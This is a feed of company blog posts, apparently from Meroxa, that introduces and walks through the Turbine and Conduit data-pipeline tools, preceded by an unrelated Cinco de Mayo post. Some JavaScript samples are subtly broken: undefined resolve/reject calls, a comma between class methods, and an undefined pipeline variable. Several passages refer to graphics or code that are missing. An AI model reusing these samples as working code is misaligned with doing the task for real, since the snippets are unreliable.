What to do this Cinco De Mayo?

As individuals who care about justice, it is always good to be mindful of our actions and how we can unknowingly contribute to negative stereotypes. Suppose we want to celebrate Cinco de Mayo with food and drinks; at the bare minimum, we should celebrate with foods embraced by Mexican culture (sorry, Mexicans do not eat burritos) and purchase food items from Latinx-owned companies.

More importantly, we can also honor the many people of Mexican ancestry who struggled to uplift social justice demands for human rights. Today, Mexicans still struggle to be treated with respect and dignity. Books to read to learn more about US-Mexico’s history:

The Border Crossed Us: The Case for Opening the US-Mexico Border by Justin Akers Chacón
No One is Illegal: Fighting Racism and State Violence on the U.S.-Mexico Border by Justin Akers Chacón and Mike Davis

Hello Meroxa 2.0

DeVaris Brown — Wed, 20 Apr 2022 18:15:00 GMT

When they go low we go high — Michelle Obama

Wowsers! What a difference a year makes!!! When Ali and I foundedMeroxa, our goal was simple: turn real-time data into the default input for how companies deliver customer value. Since launching last April, Meroxa has become the de-facto platform for creating real-time data pipelines for over 300 companies pushing billions of events through our infrastructure.

Our customers have used us to:

Build privacy law-compliant real-time analytics dashboard based on geography
Migrate petabytes of data from legacy, on-premise data warehouses to cloud-native solutions
Transform legacy, proprietary data from sensors to report on aircraft health in real-time
Update fraud detection models in real-time to more accurately prevent unauthorized transactions
Using completed transactions to update a search index in real-time for an e-commerce platform
Dynamic pricing and driver availability based on demand for an online grocer
And much, much more…

While taking a deep dive into who’s actually using our product, we noticed software engineers were increasingly our biggest audience. To better serve their needs, we released aTerraform provider so they could programmatically build their pipelines, but if I’m being brutally honest, we knew that wasn’t enough to warrant their attention. This space is extremely crowded. There are 1700+ tools in the marketplace that help folks move data from one place to the next at various speeds and fidelity. Even with a plethora of point solutions in the “modern” data stack, engineers are spending more time dealing with the nuances of integration instead of delivering business value.

Alongside our research, we also started hearing increased chatter about the importance of data applications. Today’s manifestation of data apps mostly takes the shape of analytics dashboards. While useful, this still feels a bit underwhelming given the number of data-specific platforms and tools at an engineer’s disposal.

Fret no more engineers. We heard you loud and clear and I’d like to submit Meroxa’s data application framework, Turbine, for your approval. Turbine represents a big change for not only Meroxa the company (hence the 2.0) but for the industry as well. Most of the tools in the data space focus on low code dashboards to do replication and/or integration. Turbine is a code-first offering that empowers software engineers to use the tools and best practices they’ve been employing for years to solve problems at scale.

With Turbine being just code, there’s no need to have separate workflows for your app and your data infrastructure. Turbine is to data applications as Rails is to web application development. We provide an opinionated, yet flexible framework that allows engineers to create real-time data solutions in days not months. Want to test the output of a pipeline before deploying it to production? Write unit tests that can be executed locally on your machine. Want to understand the impact of changes to your data model on your existing infrastructure? Write integration tests. Turbine allows you to bring software engineering best practices to the data world without procuring yet another point solution.

At Meroxa, we understand the importance of easy access to data for our customers so they can in turn provide value to their customers. We’re excited to evolve the data app status quo beyond dashboard visualizations and give engineers the tools to build engaging innovative solutions. If you’re excited and want to learn more about how we put the app in data app, check out theTurbine: Putting the “App” in Data App blog post,docs, and examples to get started. We can’t wait to see what you build!

Real-time Search Indexing with Turbine and Algolia

Taron Foxworth — Wed, 20 Apr 2022 16:58:00 GMT

Developers often consider using operational databases (e.g.PostgreSQL,MySQL) to perform search. However, search engines likeAlgolia are more efficient for the searching problem because they provide low-latency search querying/filtering and search-specific features such as ranking, typo tolerance, and more.

Once you have decided on a search engine, your next step is to inevitably answer:How do you send andcontinuously sync data to Algolia?

This is whereTurbine comes in. With Turbine, you can properly test, review, and build data integrations in a code-first way. Then, you can easily deploy your data application to Meroxa. No more fragile deployments, no more manual testing, no more surprise maintenance, just code.

Here is what a Turbine Application looks like:

const { updateIndex } = require('./algolia.js');

exports.App = class App {
  sendToAlgolia(records) {
    records.forEach(record => {
      updateIndex(record);
    });
    return records;
  }

  async run(turbine) {
    
    let source = await turbine.resources('postgresql');

    let records = await source.records("User");

    await turbine.process(records, this.sendToAlgolia, {
      ALGOLIA_APP_ID: process.env.ALGOLIA_APP_ID,
      ALGOLIA_API_KEY: process.env.ALGOLIA_API_KEY,
      ALGOLIA_INDEX: process.env.ALGOLIA_INDEX,
    });

  }
};

In this article, we are going to create a data application to ingest and sync data from PostgreSQL to Algolia.

This application usesJavaScript, but Turbine also has Python, Go and Ruby libraries.

Here is a quick overview of the steps we will take to get started:

How it works?
Setup
Data Application
- Entrypoint
- Indexing to Algolia
- Secrets
Running
- Verifying
Deployment
What's next?

How it works?

A data application responds to events from your data infrastructure. You can learn more about the anatomy of a Javascript data application in thedocumentation.

This data application will:

Listen toCreate, Update, and Delete events from a Postgres database.
Write the data to an Algolia index.

Setup

Before we begin, you need to setup a few things:

$ meroxa login

Clone the example to your local machine:

$ git clone git@github.com:meroxa/turbine-js-examples.git

Since this example uses Javascript, you will need to haveNode.js installed.

Copy thesearch-indexing-algolia directory to your local machine:

$ cp -r ~/turbine-js-examples/search-indexing-algolia ~/

Install NPM dependencies:

$ cd search-indexing-algolia
$ npm install

Now we are ready to build.

Data Application

A data application responds to events from our data infrastructure. For example, as the customer interacts with PostgreSQL, we need to update the Algolia index.

You can learn more about the anatomy of a Javascript data application in thedocumentation.

Entrypoint

Withinindex.js we will create a data application that will listen to theUser table in PostgreSQL.

const { updateIndex } = require('./algolia.js');

exports.App = class App {
  sendToAlgolia(records) {
    records.forEach(record => {
      updateIndex(record);
    });
    return records;
  }

  async run(turbine) {
    
    let source = await turbine.resources('postgresql');

    let records = await source.records("User");

    await turbine.process(records, this.sendToAlgolia, {
      ALGOLIA_APP_ID: process.env.ALGOLIA_APP_ID,
      ALGOLIA_API_KEY: process.env.ALGOLIA_API_KEY,
      ALGOLIA_INDEX: process.env.ALGOLIA_INDEX,
    });

  }
};

Here is what the code does:

export.App - This is the entry point for your data application. It is responsible for identifying the upstream datastore, the upstream records, and the code to execute against the upstream records. This is the data pipeline logic (move data from here to there).

exports.SendToAlgolia - This is the function that is executed against the upstream records. It is responsible for indexing the records.

Indexing to Algolia

TheupdateIndex function is responsible updating the index in Algolia.

const algoliasearch = require('algoliasearch')

const client = algoliasearch('APPLICATION_ID', 'APPLICATION_KEY')
const index = client.initIndex('dev_users')

function updateIndex(record) {
    const { payload } = record.value
    const { before, after, op } = payload

    if (op === 'r' || op === 'c' || op === 'u') {
        console.log(`operation: ${op}, id: ${after.id}`)

        after.objectID = after.id
        index
            .saveObject(after)
            .then(() => {
                resolve(after)
                console.log(`saved ${after.id}`)
            })
            .catch((err) => {
                console.log(`error saving ${after.id}`)
                reject(err)
            })
    } else if (op === 'd') {
        console.log(`operation: d, id: ${before.id}`)
        index
            .deleteObject(before.id)
            .then(() => {
                console.log(`deleted ${before.id}`)
                resolve(before)
            })
            .catch((err) => {
                console.log(`error deleting ${before.id}`)
                reject(err)
            })
    }
}

// exports
module.exports = {
    updateIndex,
}

This method willsaveObject if the record was created, or updated. It willdeleteObject if the record was deleted. This allows Algolia to stay perfectly in sync with your data infrastructure.

Secrets

You will need to update the Algolia credentials.

Running

Next, you may run your data application locally:

$ meroxa app run

Turbine usesfixtures to simulate your data infrastructure locally. This allows you to test without having to worry about the infrastructure. Fixtures are JSON-formatted data records you can develop against locally. To customize the fixtures for your application, you can find them in thefixtures directory.

Verifying

You can verify the success of your data application by verifying the data in your Algolia index specified in theupdateIndex function.

const client = algoliasearch('APPLICATION_ID', 'APPLICATION_KEY')
const index = client.initIndex('dev_users')

Deployment

After you test the behavior locally, you can deploy it to Meroxa.

Meroxa is the data platform to run and execute your Turbine apps. Meroxa takes care of maintaining the connection to your database and executing your application as changes. All you need to worry about is the data application itself.

Here is how you deploy:

Add a PostgreSQL resource to your Meroxa environment:

$ meroxa resource create postgresql \
--type postgres \
--url postgres://$PG_USER:$PG_PASS@$PG_URL:$PG_PORT/$PG_DB

Deploy to Meroxa:

$ meroxa app deploy

Now, as changes are made to the upstream data infrastructure, your data application will be executed.

What's next?

In this guide, we have covered the basics of how to build a data application and deploy to Meroxa. This application will move data from your PostgreSQL database to your Algolia index.

Here are some additional resources:

I can't wait to see what you build 🚀. If you have any questions or feedback:Join the Community

Real-time eCommerce Order Data Warehousing and Alerting with Turbine

Taron Foxworth — Wed, 20 Apr 2022 16:50:00 GMT

Data warehouses likeSnowflake allow you to collect and store data from multiple sources so that it can be accessed and analyzed. Real-time data warehousing is essential for e-commerce because it allows for up-to-the-minute analysis of customer behavior. In addition, the same data could be used to generate alerts about successful orders or potential fraud.

An approach often used to solve this problem is to use two entirely different tools: one tool to ingest into a data warehouse and another to make use of reverse ETL to perform alerting from data that's being activated within the data warehouse itself. However, this is difficult to maintain and can be a costly process.

Instead, you can use just Turbine to perform both real-time warehousing and alerting to Slack.

Here is what a Turbine Application looks like:

exports.App = class App {
    async run(turbine) {
        let source = await turbine.resources('pg')

        let records = await source.records('customerOrders')

        let data = await turbine.process(records, this.sendAlert)

        let destination = await turbine.resources('snowflake')

        await destination.write(data, 'customerOrders')
    }
}

This application usesJavaScript, but Turbine also hasPython,Go andRuby libraries.

Here is a quick overview of the steps we will take to get started:

How it works?
Setup
Data Application Entrypoint
Running
Deployment
What's next?

How it works?

A data application responds to events from your data infrastructure. You can learn more about the anatomy of a Javascript data application in thedocumentation.

This data application will:

Listen toCreate, Update, and Delete events from a Postgres database. This is where the orders are stored.
Write the order data to Snowflake.
Send an alert to Slack when an order is created.

Setup

Before we begin, you need to setup a few things:

$ meroxa login

Clone the example to your local machine:

$ git clone git@github.com:meroxa/turbine-js-examples.git

Since this example uses Javascript, you will need to haveNode.js installed.

Copy theecommerce-order-alerting directory to your local machine:

$ cp -r ~/turbine-js-examples/ecommerce-order-alerting ~/

Install NPM dependencies:

$ cd ecommerce-order-alerting
$ npm install

Now we are ready to build.

Data Application Entrypoint

const { sendSlackMessage } = require('./alert.js')

exports.App = class App {
    sendAlert(records) {
        records.forEach((record) => {
            let payload = record.value.payload
            sendSlackMessage(payload)
        })

        return records
    }

    async run(turbine) {
        let source = await turbine.resources('pg')

        let records = await source.records('customerOrders')

        let data = await turbine.process(records, this.sendAlert)

        let destination = await turbine.resources('snowflake')

        await destination.write(data, 'customerOrders')
    }
}

Running

Next, you may run your data application locally:

$ meroxa app run

Turbine will usesfixtures to simulate your data infrastructure locally. This allows you to test without having to worry about the infrastructure. Fixtures are JSON-formatted data records you can develop against locally. To customize the fixtures for your application, you can find them in thefixtures directory.

Deployment

After you test the behavior locally, you can deploy it to Meroxa.

Here is how you deploy:

Add a PostgreSQL resource to your Meroxa environment:

$ meroxa resource create postgresql \
--type postgres \
--url postgres://$PG_USER:$PG_PASS@$PG_URL:$PG_PORT/$PG_DB

Add a Snowflake data warehouse resource to your Meroxa environment:

$ meroxa resource create snowflake \
--type snowflakedb \
--url "snowflake://$SNOWFLAKE_URL/meroxa_db/stream_data" \
--username meroxa_user \
--password "$SNOWFLAKE_PRIVATE_KEY"

Deploy to Meroxa:

$ meroxa app deploy

Now, as changes are made to the upstream data infrastructure, your data application will be executed.

What's next?

That's it! Your data application is now running. You can now verify the data in your Data Warehouse.

We can't wait to see what you build 🚀.

If you have any questions or feedback:Join the Community

Real-time Data Lake Ingestion with Turbine

Taron Foxworth — Wed, 20 Apr 2022 16:37:00 GMT

Data lakes have become a popular method of storing data and performing analytics.Amazon S3 offers a flexible, scalable way to store data of all types and sizes, and can be accessed and analyzed by a variety of tools.

Real-time data lake ingestion is the process of getting data into a data lake in near-real-time. Today, this can be accomplished by using streaming data platforms, message queues, and event-driven architectures, but these are very complex systems.

Turbine offers a code-first approach to building real-time data lake ingestion systems. This allows you to build, review, and test data products with a software engineering mindset. In this guide, you will learn how to use Turbine to ingest data into Amazon S3.

Here is what a Turbine Application looks like:

exports.App = class App {
  async run(turbine) {
    let source = await turbine.resources("pg");

    let records = await source.records("customer_order");

    let anonymized = await turbine.process(records, this.anonymize);

    let destination = await turbine.resources("s3");

    await destination.write(anonymized, "customer_order");
  }
};

This application usesJavaScript, but Turbine also hasPython,Go andRuby libraries.

Here is a quick overview of the steps we will take to get started:

How it works?
Setup
Application Entrypoint
Running
Deployment

How it works?

A data application responds to events from your data infrastructure. You can learn more about the anatomy of a Javascript data application in thedocumentation.

This data application will:

Listen toCREATE,UPDATE, andDELETE events from a PostgreSQL database.
Anonymize the data using a custom function.
Write the anonymized data to an S3 bucket.

Setup

Before we begin, you need to setup a few things:

$ meroxa login

Clone the example to your local machine:

$ git clone git@github.com:meroxa/turbine-js-examples.git

Since this example uses Javascript, you will need to haveNode.js installed.

Copy thereal-time-data-lake directory to your local machine:

$ cp -r ~/turbine-js-examples/real-time-data-lake-ingestion ~/

Install NPM dependencies:

$ cd real-time-data-lake-ingestion
$ npm install

Now we are ready to build.

Application Entrypoint

Withinindex.js you will find the main entrypoint to our data application:

const stringHash = require("string-hash");

function iAmHelping(str) {
  return `~~~${str}~~~`;
}

function isAttributePresent(attr) {
  return typeof(attr) !== 'undefined' && attr !== null;
}

exports.App = class App {
  anonymize(records) {
    records.forEach((record) => {
      let payload = record.value.payload;
      if (isAttributePresent(payload.after) && isAttributePresent(payload.after.customer_email)) {
        payload.after.customer_email = iAmHelping(
          stringHash(payload.after.customer_email).toString(),
        );
      }
    });
  
    return records;
  },

  async run(turbine) {
    let source = await turbine.resources("pg");

    let records = await source.records("customer_order");

    let anonymized = await turbine.process(records, this.anonymize);

    let destination = await turbine.resources("s3");

    await destination.write(anonymized, "customer_order");
  }
};

Here is what the code does:

export.App - This is the entrypoint for your data application. It is responsible for identifying the upstream datastore, the upstream records, and the code to execute against the upstream records. This is the data pipline logic (move data from here to there).

anonymize is the method defined for ourApp that will be called to process the data. It takes a single parameter,records. This is an array of records. This function will return a new array of records with the anonymized data.

Running

Next, you may run your data application locally:

$ meroxa app run

Deployment

After you test the behavior locally, you can deploy it to Meroxa.

Here is how you deploy:

Add a PostgreSQL resource to your Meroxa environment:

$ meroxa resource create pg \
--type postgres \
--url postgres://$PG_USER:$PG_PASS@$PG_URL:$PG_PORT/$PG_DB

Add a Amazon S3 resource to your Meroxa environment:

$ meroxa resource create datalake \
--type s3 \
--url "s3://$AWS_ACCESS_KEY:$AWS_ACCESS_SECRET@$AWS_REGION/$AWS_S3_BUCKET\"

Deploy to Meroxa:

$ meroxa app deploy

That's it! Your data application is now running. You can now verify the data in your Amazon S3 bucket.

We can't wait to see what you build 🚀.

If you have any questions or feedback:Join the Community

Turbine: Putting the “App” in Data App

Rimas Silkaitis — Wed, 20 Apr 2022 16:12:00 GMT

We’re excited to share the next chapter of Meroxa and what it means for software engineers to build, test and deploy data applications. Building data-driven applications in today’s world is incredibly complex. Most of the underlying infrastructure and tooling that helps make real-time and event-driven applications possible requires that developers build all sorts of plumbing before they can deliver real to their customers. Being able to follow standard DevOps practices that developers have come to expect when building web apps is almost non-existent in the current data app world.

Today, Meroxa is pleased to introduce a public beta of Turbine. Turbine is a code-first data application framework that engineers can use to build features that respond to and run code against data changes and events, in real-time. The best part about Turbine is that it fits within your current development workflows (e.g. Build, Test, & Deploy) to the point where building a data app will feel a lot like writing a web app. When coupled with the Meroxa platform, Turbine data apps are easily deployed and scaled to meet the velocity of the data changes happening upstream.

Getting Started

Building data apps start with the Meroxa CLI on your operating system of choice (Windows, Mac, & Linux). Once you’ve got the CLI installed, creating the initial data app is a simple command:

$ meroxa apps init customer_360 –lang js

You’ll get a new directory called `customer_360` on your machine with all of the scaffolding needed to start building the app in JavaScript. The app has a small set of conventions that you need to follow. The best part about this approach is that we didn’t create any bespoke DSLs or some YAML to drive the application and the infrastructure. If JavaScript isn’t your thing, you can write Turbine apps in Go, and Python!

Enrich Customer Data As it Comes In

Being able to respond to customers immediately is critical to engagement. At Meroxa, anytime someone creates an account, we take that data and enrich it using the Clearbit API before storing it back in our production database. We’ve taken a simplified version of our code to demonstrate how we do it. You’ll see a simple Turbine app that listens to a production PostgreSQL database (`demo_pg`) for changes, runs custom code via the `Process` function, and writes that data back to PostgreSQL.Full enrichexample code on GitHub

This is the core of the entire Turbine application. While this example is in Go, the same could be written inJavaScriptorPython.

Bringing Developer Experience to Real-Time

Infrastructure should be there to support the developer and what they’re trying to accomplish, not the other way around. A lot of the emphasis on real-time architectures is placed on the infrastructure itself without regard to how developers have to code against these new paradigms. This is why real-time data apps have only been available to large organizations that have dedicated teams to develop against the paradigm. Hence, why we built Turbine. But don’t take our word for it:

***Calvin French-Owen (Co-Founder and former CTO @ Segment):***We processed 1m+ events/second at Segment, so we built a ton of tooling to make processing data both simple and correct. We never open-sourced them, so I’m glad to see Meroxa making it available to the world with Turbine. Simple,and performant.

Fredrik Björk (Co-Founder and CEO @ Grafbase): Finally a code-first approach to real-time applications that lets developers focus on shipping code over infrastructure.

Rob Malnati (COO @ thatDot): thatDot specializes in detecting complex relationships in real-time data via Quine, our open-source streaming graph processor. Turbine & Meroxa makes it almost trivial for any developer to bring these new capabilities to their applications by moving data with ease so that real-time can truly be the default.

Feedback & Learn More

We’ve only scratched the surface of what’s possible with data apps. During this beta period, we want to make sure we make Turbine and the Meroxa platform as reliable as possible before calling them generally available. Our promise is to be open and transparent about the current state of these solutions and build in concert with your feedback. For an in-depth look, checkout out thedocumentation. If you have any questions or comments, feel free to connect with us onDiscord, or email us atsupport@meroxa.io.

We’re so excited to share this next step in our journey and remove all the barriers to building real-time data applications.

Conduit 0.2: Making Connectors a Reality

Rimas Silkaitis — Tue, 05 Apr 2022 16:22:00 GMT

Conduit 0.2 is here! A data movement tool is only as good as the number of systems it can support. We’ve all seen large production environments that have many different data stores from the standard relational databases, like PostgreSQL and MySQL, to event monitoring systems, like Prometheus, and everything in between. For this reason, being able to build connectors to meet the needs of your production environments and data stores is critical. In this release, Conduit now has an official SDK that will allow developers to build connectors for any data store.

The second problem that this release sets to tackle is helping developers migrate from legacy systems to Conduit. Swapping out a critical piece of infrastructure is something that isn’t taken lightly. Systems are usually swapped out in pieces to understand the performance characteristics to help minimize downtime and minimize impact to downstream systems. Conduit 0.2 ships with the ability to leverage your current Kafka Connect connectors. This will enable you to use your current Kafka Connect connectors while using Conduit under the hood. The benefit is you can transition to an official Conduit connector on a timeline that works for you.

A Simple Connector Lifecycle

Building your own connector starts with theConduit Connector SDK and deciding on whether you need your connector to pull data from a data source, push data to a data source, or possibly both. One of the design goals of the SDK was to make the implementation of connectors as simple and painless as possible. For example, let’s assume you want to build a connector that subscribed to a channel in Redis. The Redis connector would only need to implement four functions to be full-featured. Each function has a purpose in the connector lifecycle.

Conduit Connector Lifecycle

That’s it! With these four methods, a connector can be created and you can start moving data between any of the other Conduit connectors. For more details, make sure to checkoutthe ADR for the system on GitHub.

Easing the Transition from Kafka Connect

Changing backends when you’re dealing with high-velocity data has two challenges. The first is performing a migration while data is still being produced by upstream systems and the second is subtle changes in connector behaviors between the legacy system and the new one. To avoid these challenges, Conduit allows the operator to change the underlying system without having to worry about changes in connector behavior. This allows you to make the migration and preserve the investment you may have made in building custom Kafka Connect connectors. This allows operators to explore the benefits of using Conduit in their staging and production environments without having to get the entire engineering team involved to make changes to upstream or downstream systems. It’s a win-win for all!

To get started, all you need to do is download the Kafka Connect package you want to use for your datastore and point Conduit to it. All of the settings you would have needed to pass to your Kafka Connect connector can pass through via the Conduit setup.

Let’s assume Conduit is set up on your machine using the standard setup and you already have an empty pipeline ready to go:That’s a lot of settings! In the example above, the keys that start with `wrapper.*` are specific to the Conduit setup. The rest of the settings are for the Kafka Connect connector. Any setting name that you would have used in Kafka Connect will pass through, no need to do anything different.

Check Out the Rest

Creating connectors represents only a portion of what we released for Conduit 0.2. For all of the changes, make sure to check out the changelog on the releases page for 0.2. Join us on GitHub Discussions or Discord for any questions or feedback on where we’re taking Conduit.

Writing Data Integration Software with the Conduit REST API

Taron Foxworth — Thu, 24 Mar 2022 16:36:00 GMT

Today, software engineers have a lot of tools to move data from one place to another. Conduit, our OSS data integration tool written in Go, includes an API that devs can use to programmatically build pipelines. Since Conduit ships as a tiny single binary, it functions as a powerful tool that allows you to efficiently move data from one place to another.

Today, Conduit provides aRESTful HTTP andgRPC Pipeline APIs that allow you to perform behaviors such as:

Creating data pipelines
Creating connectors (ex. PostgreSQL, Kafka, File, etc.)
Starting/stopping pipelines

These APIs allow you to fully manage the lifecycle of a pipeline from creation to tear down. Even though Conduit provides both of these interfaces, in the rest of the guide, the examples and use case will focus on the HTTP APIs.

Why is this important?

Having access to an API is important when writing software that moves data around and allows us to think differently about writing data integration software. Here are the three advantages:

Abstraction — The software you write can focus on the task at hand rather than on the mechanics of moving data.

Automation — Your code can fully automate the pipeline lifecycle. You can build tools to orchestrate data movement. All you need is the Conduit binary and an HTTP library.

Language-Agnostic — You can interface with the HTTP server from any programming language.

Creating a Pipeline using Node.js

For example, let’s say you wanted to build a new tool that moves data from PostgreSQL to a file. This could be the case for performing a data backup or downloading data for analysis. In this case, the tool’s job is to move data from one place to another.

Now, there are many ways to approach this problem. But here, I’ll describe how we could approach this with Conduit. In this case, we can write a script that uses the HTTP API to:

Create a new pipeline.
Create a PostgreSQL connector to query data from PostgreSQL.
Create a File Connector to store the result in a file.
Run the Pipeline.

Note: Conduit does ship with a UI to give you an easy-to-use interface to build pipelines and is a great place to start. However, building the pipeline with code gives us the ability to review, commit, deploy this pipeline like the other critical components of our infrastructure. With Conduit, you can stop writing one-off scripts to move data.

From a high level, here are the tasks our code needs to perform. To begin writing this, we need to:

First, Start Conduit to get the REST API Server up and running:

In the above graphic, you can see the HTTP server by default runs on port 8080 and the gRPC server runs on port 8084.

Next, we can now use any generic HTTP client from any language to interact with the Conduit API. Here is an example using the Node.jsAxios HTTP library:


const axios = require(‘axios’);const POSTGRES_TABLE = ‘my_table’;const POSTGRES_URL = ‘postgres://user:password@host:port/database’;const CONDUIT_HOST = ‘http://localhost:8080';// A function to call the Conduit APIasync function createConnector(config) {try {const pipeline = await axios.post(`${CONDUIT_HOST}/v1/connectors`, config);return pipeline.data;} catch (error) {console.log(error);throw Error(‘Could not create connector’);}}const main = async () => { // Connector Configuration// See more: https://github.com/ConduitIO/conduit-connector-postgres const postgresConfig = {type: ‘TYPE_SOURCE’,plugin: `/pkg/plugins/pg/pg`,pipelineId: pipeline.id,config: {name: ‘pg’,settings: {table: POSTGRES_TABLE,url: POSTGRES_URL,cdc: ‘false’,},},}; const connector = await createConnector(postgresConfig);console.log(pipeline, connector);}main();

const axios = require(‘axios’);const POSTGRES_TABLE = ‘my_table’;const POSTGRES_URL = ‘postgres://user:password@host:port/database’;const CONDUIT_HOST = ‘http://localhost:8080';// A function to call the Conduit APIasync function createConnector(config) {try {const pipeline = await axios.post(`${CONDUIT_HOST}/v1/connectors`, config);return pipeline.data;} catch (error) {console.log(error);throw Error(‘Could not create connector’);}}const main = async () => { // Connector Configuration// See more: https://github.com/ConduitIO/conduit-connector-postgres const postgresConfig = {type: ‘TYPE_SOURCE’,plugin: `/pkg/plugins/pg/pg`,pipelineId: pipeline.id,config: {name: ‘pg’,settings: {table: POSTGRES_TABLE,url: POSTGRES_URL,cdc: ‘false’,},},}; const connector = await createConnector(postgresConfig);console.log(pipeline, connector);}main();

To dig in deeper, you can download and run a full example from Github.

What’s Next:

I hope this is the foundation for your next big data project. Now it’s your turn to give this example a try for your own use case or try in another programming language.

Here are some guides you can use to dig into Conduit:

Here are some ways you can connect with us:

Chat with the Conduit team in theDiscord Community
Request features/ ask questions about Conduit inGitHub Discussions
Send bug reports toGitHub Issues.
Check out theConduit Documentation.
Show us love onTwitter.

I can’t wait to see what you build 🚀

Deploying Conduit on Heroku

Lyric Hartley — Thu, 10 Mar 2022 17:44:00 GMT

If you are not familiar withConduit, you can get the low downhere. If you don’t know aboutHerokueither, you may be lost? No worries, I am here to help. The short version is Conduit is a tool to move data around and Heroku is an application platform. Ok, let’s get the two hitched up.

Intro

Why might you want to deploy Conduit on Heroku? Heroku provides an easy platform to get an application up and going. It has some free data resources like PostgreSQL as well. This gives youfree hosting and data for Conduit!

Methods of Deploy

At a high level, there are two options: deploy Conduit pre-built or build it on Heroku. The advantage of deploying the pre-built version is that dependencies will already be met. The downside is that you can’t change the build configuration. We will touch on why you may want to tweak the build configuration in the “Considerations” Section.

Docker

Using Heroku’s Docker support makes deploying the latest Conduit to Heroku easy as it gathers your dependencies. Docker operates a little bit differently than regular Heroku deploys. You can look over the details here.

You can test this method via this repo.

Go lang Binary

Conduit provides a Go binary as part of each release. The latest can be found here. To deploy a Go binary to Heroku you will need to give Heroku something to detect. For example, we use a package.json file to trick the build process in this repo.

You can test this method via the button below, which is based on version 0.11 of Conduit.

When the deploy is done, you can clickView orManage > View to open the app in the browser. You may need to change the base URL to land on the Admin UI.

The base URL will be:

https://[application-name].herokuapp.com/ui/pipelines

For example:

Conduit UI

A Conduit GitHub Repo

You can deploy Conduit to Heroku using theGo buildpack. We provide a test version of this method via the button below. This version does not have the UI enabled for security reasons (see below). To learn more about building Conduit from source you can reference thebuild instructions.

Considerations

Persisting of Configuration

By default, Conduit stores its configuration on the local disk inconduit.db. Heroku has anephemeral file system. This means that you will lose your configuration when the file system is “reset” and that happens on every restart. The dynos arerestarted every 24 hours and anytime there is a new “release” or deploy. You will want to add aHeroku PostgreSQL addon and use the option below as part of your start command to let Conduit know to store the configs in PostgreSQL.

$ web: ./conduit -db.postgres.connection-string $DATABASE_URL

You can use thisProcfile as an example. The deploy buttons above include the addon and this option.

HTTP API Port binding

Heroku web appsbind to$PORT when they startup. By default, Conduit uses port 8080, which will not work. This will need to be set for Conduit via the following flag. Note the leading: .

$ ./conduit -http.address :$PORT

Conduit HTTP security

The Conduit UI does not currently have authentication in front of it. One option is to build Conduit without the UI (like in the Go repo button above). This would be better for production deploys. If you still want a UI, you have a couple of options.

You can add a buildpack like thenginx buildpack andconfigure it to provide authentication. Or, in the Procfile you can set yourprocess type to something other thanweb: e.g.worker: and it will not bind to a port connected to the public internet. As this may work well in Private Spaces (or using aninternally routed dyno) it may not be viable in the Common runtime (e.g. free dyno).

gRPC API lack of support

gRPC requires HTTP/2. Herokudoes not currently support HTTP/2. So, you will not be able to use the gRPC admin API.

What’s Next?

Now that you have Conduit up and going, you can visit theConduit.io or view the docs in therepo. And get started building Pipelines!

PostgreSQL Connector
Kafka Connector (may require a Private Space)

Let us know if you have any issues!

Conduit Now and Into the Future

Rimas Silkaitis — Wed, 09 Mar 2022 17:49:00 GMT

Today, we’re excited to announce thepublic roadmap forConduit, our open-source data integration tool. The Conduit team manages all features and bugs in GitHub Issues within the repo, but the sheer volume of issues can make it hard to decipher the overarching goal of a release. The Conduit roadmap is meant to provide insight into the major bodies of work we want to achieve within any given release. This will bring transparency to what’s being prioritized, why it’s being prioritized, and more importantly, when to expect it.

An essential factor in the execution of our roadmap is the release process. Conduit will follow a six-month cycle. This means we won’t delay a release for a feature. If a feature is slated to be in the next version, but we can’t complete it by the time the release goes out, it’ll go out in the following version. We feel release consistency is more important than features. The driving force behind this decision is the supportability of releases. The team is committed to supporting the last three versions of Conduit. Every version will be fully supported for a year and a half before it’s deprecated. Let’s walk through an example where we’re currently working on 0.6 and have already released version 0.2 through 0.5:

The roadmap will show what’s planned for the next two releases and a list of future features that illustrate the vision for Conduit. Any issues that you find within the Conduit repo tagged with `roadmap` are features and bugs that are “must-haves” for any given release. That doesn’t mean we won’t get other issues and bugs into a release. It just means the team will work on these items first. Also, if you do want to test any of these features before the official launch, you can check out the nightly releases to kick the tires on new functionality. Do note if you’re interested in contributing, we’ll make every effort to get your PR merged into the current release.

We’re committed to working on Conduit in the open with the community. Significant changes to the roadmap or shifts in the timeline will be communicated via theDiscussions section of the Conduit repository on GitHub.

Share your feedback and stay connected

If you have any questions, comments, or input on the direction of Conduit, please join us on the ConduitDiscussions page or onDiscord. If you’d rather share in private, you can also reach out to me directly atrimas@meroxa.io. I’m looking forward to working with you on making streaming data work between your production data stores. 🎉🎉🎉🎉

“Real-time” is becoming the default expectation. What's holding it back?

Lyric Hartley — Fri, 25 Feb 2022 14:00:00 GMT

The world keeps moving faster, trending towards more rapid delivery of goods, services, and ideas. We use the term “Real-time” to mean that it happens as close to “now” as possible. For ideas, the internet is an obvious multiplier and we can easily see how it enables information to spread at, well, close to the speed of light.

A number of new technologies aim to accelerate this for goods and services as theexpectations for “faster’’ continue to grow. In PwC’s June 2021 Global Consumer Insights Survey, 87% of responding consumers rankedreliability andfast delivery as top concerns when shopping online. After reading that stat a few questions came to mind:

What is at the core of those feelings?

What should we be thinking about as the world trends towards “real-time” being the default expectation in all domains?

What does this mean for businesses?

Let’s tease this apart a bit.

Time is scarce and valuable

Time is finite, it keeps moving forward no matter what we think about it. As more things are required of us, the time consumed becomes more valuable. Time is one of our most scarce, non-renewable resources. We may be able to backfill some resources, but not time. We’re all getting pulled into this new speedy world of change whether we want to or not. Someone demands something speedy from you, you, in turn, require speedy results from someone else.

Scarcity increases valueandtime is becoming increasingly scarce.

The thing that then begins to differentiate you from your competitor is how long it takes for the customer to get value from what you offer.

You can set yourself apart by showing that you value your customer’s time more than your competitors. Showing them that you care.

However, speed is only one part of the equation. It has to be accurate as well or…well, it wastes to fix it. That is often more frustrating than the time “saved” on the front end. And it will certainly get reflected back to the image of the company.

Value the customer’s time

Businesses have historically focused on saving timeinternally. Trying to make the business itself more efficient etc. However, today’s businesses have to focus onempathy for the customer by saving them time. The companies that send customers the message that theydon’t value their time, will lose…unless they have a monopoly (looking at you DMV).

Customers expect fast and reliable

While your business goals may be focused on your external customers, your internal “customers” will have the same expectations when it comes to speed and accuracy of information. You can see this in the numerous companies that service internal teams. Those teams used to send that work to another internal team like IT. Teams found they could get their needs met from someone/company externally who could deliver on the promise morereliably and faster. So, they pulled out that corporate card with a quickness.

Not all time wasters are in shipping or inaccuracies though.A company can also show a lack of empathy by wasting the customer’s time with, for example, a design or data that is not actionable. People have expectations in some of these areas already, but they will have expectations in all of them over time. It is best to understand it now.

